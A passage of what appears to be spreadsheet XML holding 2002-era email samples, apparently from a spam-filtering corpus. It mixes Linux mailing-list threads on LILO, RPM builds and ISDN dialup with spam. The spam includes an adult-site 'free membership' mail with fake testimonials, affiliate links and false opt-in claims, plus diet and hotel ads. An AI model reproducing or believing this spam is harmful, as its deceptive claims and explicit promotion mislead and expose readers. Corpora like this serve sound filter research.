     &lt;td valign="top"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td valign="top"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td width="10"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;!-- ### /promo content ### --&gt;
 &lt;/td&gt;
 &lt;td width="1"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table width="624"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width="624"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href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com'&gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;p&gt;
 &lt;A NOTRACK HREF="http://clickthru.online.com/Click?q=a5-DyfHrzZqSQXorbLmIMk61qDcw2kfasRR"&gt;Unsubscribe&lt;/A&gt;&amp;nbsp|&amp;nbsp&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://www.cnet.com/subscription/0-16335-7-6770019.html"&gt;FAQ&lt;/A&gt;
 &amp;nbsp|&amp;nbsp&lt;a href="http://www.cnet.com/aboutcnet/0-13618.html?tag=ft"&gt;Advertise&lt;/A&gt;&lt;br&gt;&lt;/font&gt;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width="624"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width="624" bgcolor="#ffcc00" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td width="1" bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10"&gt;&lt;img src="http://www.cnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="37"&gt;&lt;a href="http://www.cnet.com/frontdoor/0-1.html"&gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://shopper.cnet.com/shopping/0-1257.html"&gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; | 
 &lt;a href="http://computers.cnet.com/hardware/0-1016.html"&gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; | 
 &lt;a href="http://news.cnet.com/"&gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://download.cnet.com/downloads/0-10000.html"&gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; | 
 &lt;a href="http://www.cnet.com/sitemap/0-2253447.html"&gt;&lt;font color="#000000"&gt;All CNET services&lt;/font&gt;&lt;/a&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="624" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td height="25"&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;tr:ad name="copyright"/&gt;
 &lt;/a&gt;.&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=ba-m-95-hpITW8NcktOu5LdlZB0PRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Oct 02, 2002 at 10:45:04PM +0200, Matthias Saou wrote:
 &gt; &gt; So I've attached a patch to specify an alternate kernel by setting the
 &gt; &gt; "TARGET_KERNEL" environment variable before running rpmbuild. You
 &gt; &gt; still need to have the rpm for the specified kernel installed, but at
 &gt; &gt; least it doesn't have to be currently running. It's kinda hackish, so
 &gt; &gt; if someone has a better way to do this, let me know.
 &gt; 
 &gt; That idea looks good although it maybe needs to be tweaked a bit more (what
 &gt; you sent doesn't support packages named "kernel-smp"). I'd also prefer a
 &gt; cleaner way than the env variable, and preferrably not editing the spec...
 &gt; probably "--define 'target 2.4.xx-xx' --with smp". Sound good enough?
 &gt; The BuildRequires on "kernel-source" will also need to be removed because
 &gt; it won't necessarily need to be true, and that does bug me a bit :-/
 The "--define" is exactly what I was looking for! I was trying to
 figure out a way to do it within the mechanism of rpm (like the
 "--with" switches), but for some reason didn't think of using
 "--define". My computer is currently gone for repairs, but once it's
 back, I'll rewrite the specfile, add support for kernel-smp, and email
 it to the list for further criticism :)
 As far as requiring kernel-source, I don't feel it's a big problem. If
 you're gonna go to the trouble of packaging custom kernels into rpms,
 it's not a far stretch to package the source tree too (as I currently
 do).
 Also, I've found that the alsa-driver source needs a usb-related patch 
 to compile under the latest test kernels (2.4.20-preX). Are other 
 people seeing the same thing, or is this just a problem with my setup?
 gary
 P.S. If I didn't mention it before, thanks for the alsa packages! They 
 greatly simplified what used to take way too long before.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] [Bug 840] spam_level_char option change/removal
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=840
 ------- Additional Comments From felicity@kluge.net  2002-09-06 10:56 -------
 Subject: Re: [SAdev]  spam_level_char option change/removal
 On Fri, Sep 06, 2002 at 10:09:19AM -0700, bugzilla-daemon@hughes-family.org wrote:
 &gt; another (or would look terrible).  Let's just use a letter.  If
 &gt; aesthetics are your concern, I think an "x" will look just fine.
 "x" is fine, but let's not take out the config option.  if people really
 want to have it be something else, we shouldn't hinder them.
 ------- You are receiving this mail because: -------
 You are the assignee for the bug, or are watching the assignee.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</si>
  <si>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
 Just tried smartgroups: The layout of pages is pretty challenging to
 use quickly, but the most interesting aspect is that once you are in,
 there is no way to get out.  You can unsubscribe yourself as the sole
 member of a group, but you cannot delete the group.
 Or if you can, I couldn't find it before deleting myself, and now it's
 invisible to me.  Another interesting thing: Security forms are reset
 to full-public settings each time you load them, rather than set from
 your current settings.
 All in all, I wasn't impressed and have stayed with the Yahooligans
 for another run.
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fw: Re: Account For Cum Shots To: zzzz@spamassassin.taint.org OfferID: qxjx
</t>
  </si>
  <si>
    <t xml:space="preserve"> ##################################################
 #                                                #
 #                 Adult Club                     #
 #           Offers FREE Membership               #
 #                                                #
 ##################################################
 &gt;&gt;&gt;&gt;&gt;  INSTANT ACCESS TO ALL SITES NOW
 &gt;&gt;&gt;&gt;&gt;  Your User Name And Password is.
 &gt;&gt;&gt;&gt;&gt;  User Name: zzzz@spamassassin.taint.org
 &gt;&gt;&gt;&gt;&gt;  Password: 1534
 3 of the Best Adult Sites on the Internet for FREE!
 ---------------------------------------
 NEWS 08/15/02
 With just over 2.9 Million Members that signed up for FREE, Last month
 there were 721,184 New
 Members. Are you one of them yet???
 ---------------------------------------
 Our Membership FAQ
 Q. Why are you offering free access to 3 adult membership sites for
 free?
 A. I have advertisers that pay me for ad space so you don't have to pay
 for membership.
 Q. Is it true my membership is for life?
 A. Absolutely you'll never have to pay a cent the advertisers do.
 Q. Can I give my account to my friends and family?
 A. Yes, as long they are over the age of 18.
 Q. Do I have to sign up for all 3 membership sites?
 A. No just one to get access to all of them.
 Q. How do I get started?
 A. Click on one of the following links below to become a member.
 - These are multi million dollar operations with policies and rules.
 - Fill in the required info and they won't charge you for the Free pass!
 - If you don't believe us, just read their terms and conditions.
 ---------------------------
 new! &gt; Tilthy Teen Sluts (added 08-15-02)
 The Ultimate XXX TEEN Site... Its all for FREE!!
 &gt;&gt;&gt; Click Here:
 http://www.bozombo.com/filthyteensluts/index.php?affid=1534
 &lt;a
 href="http://www.bozombo.com/filthyteensluts/index.php?affid=1534"&gt;AOL
 Users Click Here&lt;/a&gt;
 new! &gt; Lucky Amateur Wives (added 08-08-02)
 Amateur Wives Giving it up... Its all for FREE!!
 http://www.bozombo.com/luckyamateurwives/index.php?affid=1534
 &lt;a
 href="http://www.bozombo.com/luckyamateurwives/index.php?affid=1534"&gt;AOL
 Users Click Here&lt;/a&gt;
 new! &gt; BOOB RANCH (added 08-01-02)
 See The Worlds Best Boobs On The Net... Its all for FREE!!
 &gt;&gt;&gt; Click Here: http://www.bozombo.com/hugetits/index.php?affid=1534
 &lt;a
 href="http://www.bozombo.com/luckyamateurwives/index.php?affid=1534"&gt;AOL
 Users Click Here&lt;/a&gt;
 --------------------------
 Jennifer Simpson, Miami, FL
 Your FREE lifetime membership has entertained my boyfriend and I for
 the last two years!  Your Adult Sites are the best on the net!
 Joe Morgan Manhattan, NY
 Your live sex shows and live sex cams are unbelievable. The best part
 about your porn sites, is that they're absolutely FREE!
 --------------------------
 Removal Instructions And Disclaimer:
 We are strongly against sending unsolicited emails to those who do not
 wish to receive our special mailings. You have opted in to one or more
 of our affiliate sites requesting to be notified of any special offers
 we may run from time to time. We also have attained the services of an
 independent 3rd party to overlook list management and removal services.
 This is NOT unsolicited email. If you do not wish to receive further
 mailings, please Click on this URL http://greenzer.com/remove.php or &lt;a
 href="http://greenzer.com/remove.php"&gt;AOL Users Click Here&lt;/a&gt; to be
 removed from the list. Please accept our apologies if you have been sent
 this email in error. We honor all removal requests.
 qvnckofayjfpfpsswkfvdrmcyljarjxw
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Installing lilo on another disk.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Jul 30, 2002 at 03:47:40PM +0100 or so it is rumoured hereabouts, 
 Niall O Broin thought:
 &gt; I'm installing warm standby disks on a number of boxes. These disks will be
 &gt; the same size (sometimes bigger) than the main disk. The idea is that every
 &gt; night I'll rsync the partitions on the main disk to the standby disk so that
 &gt; in the case of disaster, the first port of call, before the tapes, is the
 &gt; standby disk. (We did consider running Linux md RAID on the disks but RAID
 &gt; gives you no protection against slips of the finger)
 &gt; 
 &gt; So, in the event of finger slips we can mount the relevant partition and
 &gt; retrieve the banjaxed file. In the case of a disk crash, the plan is that
 &gt; we'll put the standby disk in place of the main disk and the workstation
 &gt; will be back up ASAP. Then we can deal with replacing the disk without the
 &gt; pressure of a broken box on our back.
 &gt; 
 &gt; However, I'm stumped as to how to install LILO on the backup disk. Let's say
 &gt; the master disk is /dev/hda and the backup disk is /dev/hdb. lilo.conf
 &gt; currently looks like this:
 &gt; 
 &gt; boot    = /dev/hda
 &gt; change-rules
 &gt; reset
 &gt; read-only
 &gt; menu-scheme = Wg:kw:Wg:Wg
 &gt; lba32
 &gt; prompt
 &gt; timeout = 80
 &gt; message = /boot/message
 &gt; 
 &gt;   image  = /boot/vmlinuz
 &gt;   label  = linux
 &gt;   root   = /dev/hda3
 &gt;   vga    = 791
 &gt;   initrd = /boot/initrd
 &gt; 
 &gt; 
 &gt; 
 &gt; There are a couple more boot stanzas, but they're not germane. As you can
 &gt; see, / is on /dev/hda3 and /boot is on /dev/hda1. So if for instance I had
 &gt; booted from a CD and wanted to re-install LILO on this disk I'd do something
 &gt; like
 &gt; 
 &gt; mount /dev/hda3 /mnt
 &gt; mount /dev/hda1 /mnt/boot
 &gt; lilo -r /mnt
 &gt; 
 &gt; which is OK because I'm installing lilo on /dev/hda and I want it to boot
 &gt; from /dev/hda so it'll plug in all the right numbers.
 &gt; 
 &gt; However, in the case of the standby disk, I'll have to do something like
 &gt; 
 &gt; mount /dev/hdb3 /mnt
 &gt; mount /dev/hdb1 /mnt/boot
 &gt; lilo -r /mnt
 &gt; 
 &gt; But I'm obviously going to have to do something different here because I
 &gt; want to install onto /dev/hdb in such a way that the disk will boot when it
 &gt; becomes /dev/hda after a disaster (like the one I had this morning :-( -
 &gt; shutting the stable door was on the to-do list, but the bloody horse decided
 &gt; to do a bunk early). The machine already has its spare disk - just hadn't
 &gt; yet been used :-(
 &gt; 
 &gt; I thought perhaps I should just do   lilo -b /dev/hdb -r /mnt  but I think
 &gt; that -b is analogous to the boot keyword in lilo.conf. Or will this just
 &gt; work automagically ?  i.e. boot = /dev/hda tells lilo what numbers to poke
 &gt; where, and it figures out where the disk is from the -r ?
  from the Hard Disk Upgrade Mini HOWTO :
 8. Prepare LILO to boot the new disk
    (Thanks to Rick Masters for helping with this.)
    We're  assuming  that LILO is installed on the hard disk's Master Boot
    Record (MBR); this seems to be the most common configuration. You want
    to  install  LILO  on  what's  presently the second hard disk but will
    become the first hard disk.
    Edit the file /new-disk/etc/lilo.conf as follows:
         disk=/dev/hdb bios=0x80       # Tell LILO to treat the second
                                       # disk as if it were the first
                                       # disk (BIOS ID 0x80).
         boot=/dev/hdb                 # Install LILO on second hard
                                       # disk.
         map=/new-disk/boot/map        # Location of "map file".
         install=/new-disk/boot/boot.b # File to copy to hard disk's
                                       # boot sector.
         prompt                        # Have LILO show "LILO boot:"
                                       # prompt.
         timeout=50                    # Boot default system after 5
                                       # seconds. (Value is in tenths of
                                       # seconds.)
         image=/new-disk/boot/vmlinuz  # Location of Linux kernel. The
                                       # actual name may include a version
                                       # number, for example
                                       # "vmlinuz-2.0.35".
             label=linux               # Label for Linux system.
             root=/dev/hda1            # Location of root partition on
                                       # new hard disk. Modify this as
                                       # appropriate for your system.
                                       # Note that you must use the name
                                       # of the future location, once the
                                       # old disk has been removed.
             read-only                 # Mount partition read-only at
                                       # first, to run fsck.
 Conor
 PS.  Um, what does 
 &gt; menu-scheme = Wg:kw:Wg:Wg
 do?
 -- 
 Conor Daly &lt;conor.daly@oceanfree.net&gt;
 Domestic Sysadmin :-)
 ---------------------
 Faenor.cod.ie
   6:04pm  up 69 days,  3:22,  0 users,  load average: 0.00, 0.00, 0.00
 Hobbiton.cod.ie
   5:50pm  up 12 days, 27 min,  1 user,  load average: 0.00, 0.00, 0.00
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Linux: the film.
</t>
  </si>
  <si>
    <t xml:space="preserve">Linux: the film.
 http://www.revolution-os.com/  (trailer + first 8 mins online)
 I wonder if this will ever get to Ireland? Otherwise, I wonder if it would
 be possible to get the Trinity Internet Society or somewhere to show it?
 Justin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Dialup on debian
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all,
 I have a debian machine with an external ISDN terminal adapter, which 
 I'm trying to get to dial a Cisco 3600 running CHAP. wvdial on Red Hat 
 copes fine with this. However, I get the same results if i use pon or 
 wvdial on Debian: pppd negotiation is detected, pppd is started -- and 
 I'm never assigned an IP address.
 Looking at the logs on the Cisco, I see that in place of the username I 
 seem to be transmitting a six-digit hex number. e.g.:
 Aug  8 23:35:00.311 UTC+1: %ISDN-6-CONNECT: Interface Serial0/0:19 is 
 now connected to &lt;phonenum&gt; 19eb85
 The last entry should be my dialup username. (Substitute incoming phone 
 number for &lt;phonenum&gt;).
 Any ideas what I'm doing wrong?
 Cheers,
 Dave
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Guaranteed to lose 10-12 lbs in 30 days 10.206
</t>
  </si>
  <si>
    <t xml:space="preserve">1) Fight The Risk of Cancer!
 http://www.adclick.ws/p.cfm?o=315&amp;s=pk007
 2) Slim Down - Guaranteed to lose 10-12 lbs in 30 days
 http://www.adclick.ws/p.cfm?o=249&amp;s=pk007
 3) Get the Child Support You Deserve - Free Legal Advice
 http://www.adclick.ws/p.cfm?o=245&amp;s=pk002
 4) Join the Web's Fastest Growing Singles Community
 http://www.adclick.ws/p.cfm?o=259&amp;s=pk007
 5) Start Your Private Photo Album Online!
 http://www.adclick.ws/p.cfm?o=283&amp;s=pk007
 Have a Wonderful Day,
 Offer Manager
 PrizeMama
 If you wish to leave this list please use the link below.
 http://www.qves.com/trim/?ilug@linux.ie%7C17%7C114258
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Gary,
 Uh, plague is not action.  No, no one has a problem quarantining
 someone who has say, Ebola, or malaria, because diseases do not
 require any decisive action -- just contact.
 fantasies, still require decisive action, even if its in conjunction
 with the way the fantasy works in the individual's brain. Many people
 have very strange and obscure fantasies (say wanting to be a model)
 that dont' require them to be locked up.
 Fantasies aren't nearly as much like plagues.   Not everyone in a
 given population necessarily adheres to that given fantasy, whereas
 everyone can get a given plague.   (BTW, gary, the whole concept of
 monitoring a given 'racial populaiton' for fear of them getting a
 plague is silly.  I don't think plagues discriminate)
 You're trying to argue for a lock'em all up mentality, when I don't
 think anyone but you has even mentioned it.   His point was that
 fantaesies were a psychological? explanation for a possible event.
 Not that all people who have them, or even have a certain type, need
 to be locked up, quarantined, killed, rubbed-out or cleansed.
 GLM&gt; Well, for example ..
 &gt;&gt;&gt;&gt;&gt;&gt; "b" == bitbitch  &lt;bitbitch@magnesium.net&gt; writes:
 GLM&gt;     b&gt; Once we understand this [ the fantasy virus model ], many of
 GLM&gt;     b&gt; our current perplexities will find themselves
 GLM&gt;     b&gt; resolved. Pseudo-issues such as debates over the legitimacy of
 GLM&gt;     b&gt; racial profiling would disappear: Does anyone in his right
 GLM&gt;     b&gt; mind object to screening someone entering his country for signs
 GLM&gt;     b&gt; of plague? Or quarantining those who have contracted it? Or
 GLM&gt;     b&gt; closely monitoring precisely those populations within his
 GLM&gt;     b&gt; country that are most at risk?
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] Secondhand books online
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; Martin Mentioned:
 &gt; &gt;I've used this a few times and can thoroughly recommend it. It really 
 &gt; &gt;doeswork. Frankly, the only drawback is finding too much stuff.
 &gt;Rachel Rote; 
 &gt; I'll be amazed if there's anyone on here who isn't already a heavy user!
 Barbara Babbles;
 Be amazed - I've never bought anything online since an almighty cock up
 with amazon dot con (that's not a typo) a few years back where I lost
 all the dosh I'd paid them and had no books to show for it either. Had
 it been the UK branch I'd have had them in the small claims court
 quicker than you could drop LOTR on your foot and say "ouch", but as it
 was the US branch I'd just no comeback.
 Barbara
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Chicago Meeting Site
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html xmlns:v="urn:schemas-microsoft-com:vml"
 xmlns:o="urn:schemas-microsoft-com:office:office"
 xmlns:w="urn:schemas-microsoft-com:office:word"
 xmlns="http://www.w3.org/TR/REC-html40"&gt;
 &lt;head&gt;
 &lt;meta http-equiv=Content-Type content="text/html; charset=windows-1252"&gt;
 &lt;meta name=ProgId content=Word.Document&gt;
 &lt;meta name=Generator content="Microsoft Word 9"&gt;
 &lt;meta name=Originator content="Microsoft Word 9"&gt;
 &lt;link rel=File-List href="./Illinois%20flyer_files/filelist.xml"&gt;
 &lt;title&gt;THE CONVIENENCE OF&lt;/title&gt;
 &lt;!--[if gte mso 9]&gt;&lt;xml&gt;
  &lt;o:DocumentProperties&gt;
   &lt;o:Author&gt;donald bae&lt;/o:Author&gt;
   &lt;o:Template&gt;Normal&lt;/o:Template&gt;
   &lt;o:LastAuthor&gt;Donald Bae&lt;/o:LastAuthor&gt;
   &lt;o:Revision&gt;2&lt;/o:Revision&gt;
   &lt;o:TotalTime&gt;86&lt;/o:TotalTime&gt;
   &lt;o:LastPrinted&gt;2002-06-28T19:31:00Z&lt;/o:LastPrinted&gt;
   &lt;o:Created&gt;2002-08-27T21:14:00Z&lt;/o:Created&gt;
   &lt;o:LastSaved&gt;2002-08-27T21:14:00Z&lt;/o:LastSaved&gt;
   &lt;o:Pages&gt;1&lt;/o:Pages&gt;
   &lt;o:Words&gt;126&lt;/o:Words&gt;
   &lt;o:Characters&gt;720&lt;/o:Characters&gt;
   &lt;o:Lines&gt;6&lt;/o:Lines&gt;
   &lt;o:Paragraphs&gt;1&lt;/o:Paragraphs&gt;
   &lt;o:CharactersWithSpaces&gt;884&lt;/o:CharactersWithSpaces&gt;
   &lt;o:Version&gt;9.2720&lt;/o:Version&gt;
  &lt;/o:DocumentProperties&gt;
 &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
  &lt;w:WordDocument&gt;
   &lt;w:DisplayHorizontalDrawingGridEvery&gt;0&lt;/w:DisplayHorizontalDrawingGridEvery&gt;
   &lt;w:DisplayVerticalDrawingGridEvery&gt;0&lt;/w:DisplayVerticalDrawingGridEvery&gt;
   &lt;w:UseMarginsForDrawingGridOrigin/&gt;
   &lt;w:Compatibility&gt;
    &lt;w:FootnoteLayoutLikeWW8/&gt;
    &lt;w:ShapeLayoutLikeWW8/&gt;
    &lt;w:AlignTablesRowByRow/&gt;
    &lt;w:ForgetLastTabAlignment/&gt;
    &lt;w:LayoutRawTableWidth/&gt;
    &lt;w:LayoutTableRowsApart/&gt;
   &lt;/w:Compatibility&gt;
  &lt;/w:WordDocument&gt;
 &lt;/xml&gt;&lt;![endif]--&gt;
 &lt;style&gt;
 &lt;!--
  /* Font Definitions */
 @font-face
 	{font-family:Wingdings;
 	panose-1:5 0 0 0 0 0 0 0 0 0;
 	mso-font-charset:2;
 	mso-generic-font-family:auto;
 	mso-font-pitch:variable;
 	mso-font-signature:0 268435456 0 0 -2147483648 0;}
 @font-face
 	{font-family:Tahoma;
 	panose-1:2 11 6 4 3 5 4 4 2 4;
 	mso-font-charset:0;
 	mso-generic-font-family:swiss;
 	mso-font-pitch:variable;
 	mso-font-signature:553679495 -2147483648 8 0 66047 0;}
  /* Style Definitions */
 p.MsoNormal, li.MsoNormal, div.MsoNormal
 	{mso-style-parent:"";
 	margin:0in;
 	margin-bottom:.0001pt;
 	mso-pagination:widow-orphan;
 	font-size:10.0pt;
 	font-family:"Times New Roman";
 	mso-fareast-font-family:"Times New Roman";}
 h1
 	{mso-style-next:Normal;
 	margin:0in;
 	margin-bottom:.0001pt;
 	mso-pagination:widow-orphan;
 	page-break-after:avoid;
 	mso-outline-level:1;
 	font-size:36.0pt;
 	mso-bidi-font-size:10.0pt;
 	font-family:Tahoma;
 	mso-font-kerning:0pt;
 	font-weight:normal;}
 h2
 	{mso-style-next:Normal;
 	margin:0in;
 	margin-bottom:.0001pt;
 	text-align:center;
 	mso-pagination:widow-orphan;
 	page-break-after:avoid;
 	mso-outline-level:2;
 	font-size:48.0pt;
 	mso-bidi-font-size:10.0pt;
 	font-family:Tahoma;
 	font-weight:normal;}
 h3
 	{mso-style-next:Normal;
 	margin:0in;
 	margin-bottom:.0001pt;
 	text-align:center;
 	mso-pagination:widow-orphan;
 	page-break-after:avoid;
 	mso-outline-level:3;
 	font-size:24.0pt;
 	mso-bidi-font-size:10.0pt;
 	font-family:Tahoma;
 	font-weight:normal;}
 h4
 	{mso-style-next:Normal;
 	margin:0in;
 	margin-bottom:.0001pt;
 	text-align:center;
 	mso-pagination:widow-orphan;
 	page-break-after:avoid;
 	mso-outline-level:4;
 	font-size:36.0pt;
 	mso-bidi-font-size:10.0pt;
 	font-family:Tahoma;
 	font-weight:normal;}
 h5
 	{mso-style-next:Normal;
 	margin-top:0in;
 	margin-right:0in;
 	margin-bottom:0in;
 	margin-left:.25in;
 	margin-bottom:.0001pt;
 	mso-pagination:widow-orphan;
 	page-break-after:avoid;
 	mso-outline-level:5;
 	font-size:16.0pt;
 	mso-bidi-font-size:10.0pt;
 	font-family:Tahoma;
 	font-weight:normal;}
 h6
 	{mso-style-next:Normal;
 	margin-top:0in;
 	margin-right:0in;
 	margin-bottom:0in;
 	margin-left:.25in;
 	margin-bottom:.0001pt;
 	text-align:center;
 	mso-pagination:widow-orphan;
 	page-break-after:avoid;
 	mso-outline-level:6;
 	font-size:16.0pt;
 	mso-bidi-font-size:10.0pt;
 	font-family:Tahoma;
 	font-weight:normal;}
 p.MsoHeading7, li.MsoHeading7, div.MsoHeading7
 	{mso-style-next:Normal;
 	margin:0in;
 	margin-bottom:.0001pt;
 	text-align:center;
 	mso-pagination:widow-orphan;
 	page-break-after:avoid;
 	mso-outline-level:7;
 	font-size:16.0pt;
 	mso-bidi-font-size:10.0pt;
 	font-family:Tahoma;
 	mso-fareast-font-family:"Times New Roman";}
 p.MsoBodyText, li.MsoBodyText, div.MsoBodyText
 	{margin:0in;
 	margin-bottom:.0001pt;
 	mso-pagination:widow-orphan;
 	font-size:20.0pt;
 	mso-bidi-font-size:10.0pt;
 	font-family:Tahoma;
 	mso-fareast-font-family:"Times New Roman";}
 a:link, span.MsoHyperlink
 	{color:blue;
 	text-decoration:underline;
 	text-underline:single;}
 a:visited, span.MsoHyperlinkFollowed
 	{color:purple;
 	text-decoration:underline;
 	text-underline:single;}
 @page Section1
 	{size:8.5in 11.0in;
 	margin:.5in .5in .1in .5in;
 	mso-header-margin:.5in;
 	mso-footer-margin:.5in;
 	mso-paper-source:0;}
 div.Section1
 	{page:Section1;}
  /* List Definitions */
 @list l0
 	{mso-list-id:167256993;
 	mso-list-type:hybrid;
 	mso-list-template-ids:537322506 67698689 67698691 67698693 67698689 67698691 67698693 67698689 
 67698691 67698693;}
 @list l0:level1
 	{mso-level-number-format:bullet;
 	mso-level-text:\F0B7;
 	mso-level-tab-stop:.5in;
 	mso-level-number-position:left;
 	text-indent:-.25in;
 	font-family:Symbol;}
 ol
 	{margin-bottom:0in;}
 ul
 	{margin-bottom:0in;}
 --&gt;
 &lt;/style&gt;
 &lt;!--[if gte mso 9]&gt;&lt;xml&gt;
  &lt;o:shapedefaults v:ext="edit" spidmax="2050"/&gt;
 &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
  &lt;o:shapelayout v:ext="edit"&gt;
   &lt;o:idmap v:ext="edit" data="1"/&gt;
  &lt;/o:shapelayout&gt;&lt;/xml&gt;&lt;![endif]--&gt;
 &lt;/head&gt;
 &lt;body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'&gt;
 &lt;div class=Section1&gt;
 &lt;h1 align=center style='text-align:center'&gt;THE CONVENIENCE OF&lt;/h1&gt;
 &lt;h2&gt;CHICAGO&lt;/h2&gt;
 &lt;h4&gt;EASY ON YOUR BUDGET&lt;/h4&gt;
 &lt;p class=MsoNormal&gt;&lt;span style='font-size:20.0pt;mso-bidi-font-size:10.0pt'&gt;&lt;![if !supportEmptyParas]&gt;&amp;nbsp;&lt;!
 [endif]&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;p class=MsoBodyText&gt;When planning your next Chicago meeting consider the &lt;/p&gt;
 &lt;p class=MsoBodyText&gt;&lt;span style='font-size:24.0pt;mso-bidi-font-size:10.0pt'&gt;&lt;![if !supportEmptyParas]&gt;&amp;nbsp;&lt;!
 [endif]&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;p class=MsoBodyText align=center style='text-align:center'&gt;&lt;span
 style='font-size:24.0pt;mso-bidi-font-size:10.0pt'&gt;Radisson Hotel
 Chicago-Northshore&lt;/span&gt;&lt;/p&gt;
 &lt;p class=MsoBodyText style='tab-stops:513.0pt'&gt;&lt;![if !supportEmptyParas]&gt;&amp;nbsp;&lt;![endif]&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;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style='font-size:20.0pt;mso-bidi-font-size:10.0pt;font-family:Tahoma'&gt;Great
 location just 8 miles north of Downtown Chicago off I-94 Expressway&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;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style='font-size:20.0pt;mso-bidi-font-size:10.0pt;font-family:Tahoma'&gt;$85 State
